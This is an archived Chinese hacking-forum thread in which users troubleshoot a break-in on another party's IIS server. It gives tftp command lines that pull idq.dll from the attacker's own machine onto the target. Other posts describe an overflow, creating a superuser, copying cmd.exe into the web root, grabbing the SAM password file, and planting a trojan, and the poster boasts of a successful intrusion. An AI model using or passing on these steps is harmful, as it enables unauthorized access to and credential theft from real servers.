这是在 20CN网络安全小组第一代论坛 的论坛 黑客基地 中的主题 IIS难题。
要查看这个主题,请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=2;t=000826
由 quake (编号: 2913) 发表于
:
我用流光的IIS 远程执行: Remote Execute-E,dir是行的,但我上传idq.dll失败。我已经开了tftpd32.exe,设好了路径,也知道对方的主页路径。在IIS 远程执行: Remote Execute-E运行
tftp -i *.*.*.* idq.dll c://inetpub//scripts//idq.dll
文件没传上去。
还有,这个自己的ip是动态分配的ip,还是局域网的ip?(我们有2台机子上网,我是挂在另一台上的。) 
由 quake (编号: 2913) 发表于
:
不好意思,打错字了!
我用流光的IIS 远程执行: Remote Execute-E,dir是行的,但我上传idq.dll失败。我已经开了tftpd32.exe,设好了路径,也知道对方的虚拟路径(为c:\inetpub\scripts)。在I IS 远程执行: Remote Execute-E运行
tftp -i *.*.*.* idq.dll c:\\inetpub\\scripts\\idq.dll
文件没传上去。
还有,这个自己的ip是动态分配的ip,还是局域网的ip?(我们有2台机子上网,我是挂在另一台上的。)
由 §溶 (编号: 1295) 发表于
:
被上传文件应该放在TFTP的目录里,要不在IDQ.DLL前加上文件所在路径也行,你用的可能是共享上网,你可以在拨号的那台机器上运行WINI PCFG,把MODEM绑定,就可是看到真的IP了,上传的时候就用拨号时的IP
由 quake (编号: 2913) 发表于
:
我已经把idq.dll放在tftpd32目录下,在tftpd32.exe中也把路径设定为idq.dll所在的目录。
我用的是共享上网,而且我用qq的显示好友补丁已经显示我的ip,也就是主机的ip(她的qq号码是我的好友,所以显示的ip也就是我的ip,因为我们是共享的嘛!) 。
望您老再指点指点!虚心学习,万分感谢!
由 §溶 (编号: 1295) 发表于
:
tftp -i *.*.*.* idq.dll c:\\inetpub\\scripts\\idq.dll
仔细找找还有什么地方错了?好象还缺什么参数吧 
由 没影 (编号: 14) 发表于
:
tftp -i *.*.*.* get idq.dllc:\\inetpub\\scripts\\idq.dll
由 §溶 (编号: 1295) 发表于
:
没影兄弟,你那篇求助帖子可能由于CGI故障,现在打开的是空白页面,看不到你的回复,望见晾!
由 没影 (编号: 14) 发表于
:
又碰到一个难题:利用溢出进入肉鸡winnt\system32目录成功
建立超级用户成功
建立ipc$连接失败
利用tftp失败(提示tftp不是内部或外部命令)
复制cmd.exe to c;\inetpub\wwwroot成功
IE调用cmd.exe成功
现在除了下载sam和修改主页外还能上传文件吗???
由 §溶 (编号: 1295) 发表于
:
你是不是通过溢出后舰艇一个端口得到ADMIN的?如果是那样的话就想办法看FTP能不能用,远程用FTP看能不能从你本机IP下载文件,FTP> ;GET YOUIP FILE.前提是本机开了F TP服务,如果这也不行,那么可能是真的有了防火墙,而且安全策略文件还是混合型的.如果能用FTP登陆到本地机并上传下载文件,别心软,找H IV给他放个木马
[ 11-09-2001: 贴子编辑者: §溶 ]
由 quake (编号: 2913) 发表于
:
感谢各位大虾的指点,不过好象问题还是没解决,命令
tftp -i *.*.*.* get idq.dllc:\\inetpub\\scripts\\idq.dll
也打过了,还是失败。
由 §溶 (编号: 1295) 发表于
:
TFTP上传失败是常事,试试别的方法,比如用木马类的东西
由 japleak (编号: 2531) 发表于
:
主要看你上网的机子了,应该是直接接入的机子,而不是通过共享internet的那台机子。
而且也不能上传过大的文件,我曾经就只能上传主页,但不能上传srv.exe文件!也许是通过设置吧?反正我还没有完全成功!
而且还要必须有唯一的ip,这对于拨号用户绝对适用!
由 quake (编号: 2913) 发表于
:
感谢各位高手的指点。我直接拨号上网,不用共享,成功入侵。并用isap得到admin权限!^_^